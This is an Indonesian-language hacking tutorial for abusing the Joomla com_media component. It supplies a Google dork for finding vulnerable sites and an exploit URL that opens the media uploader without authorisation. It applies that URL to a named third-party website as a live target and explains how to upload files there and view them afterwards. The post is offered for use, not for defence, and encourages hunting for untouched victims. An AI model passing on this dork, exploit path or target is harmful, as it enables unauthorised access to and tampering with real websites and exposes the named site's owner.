Exploit com_media

Newbi Mau Share Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.atau lebih sering di sebut com_media ..

Dork : inurl:com_media intitle:Insert Image  site:com

*Note: Dork Bisa di kembangkan lagi .. Kali aja nemu site yang masih perawan :v
 

Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas, dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa nemu target yang fresh :)

Disini saya sudah menemukan tergetnya : http://www.wozelwu.de/

Nah, sekarang kita  tambahin aja exploitnya, jadinya begini: 

http://www.wozelwu.de/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
*Note :
-Garis Biru Site/Target Kita
-Garis Merah Exploit nya

maka akan terlihat seperti gambar berikut:

Selanjutnya agan tinggal upload file yang sobat inginkan di bagian uploader..

Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa. 

kalo berhasil, akan muncul keterangan seperti berikut:

Nah Jika Berhasil untuk melihat hasil file yang sudah kita upload di sini: www.site.com/images/namafile

Contoh seperti gambar berikut :

Sekian tutorial dari newbie :) mohon maaf bila ada salah kata atau acak-acakan xixixi..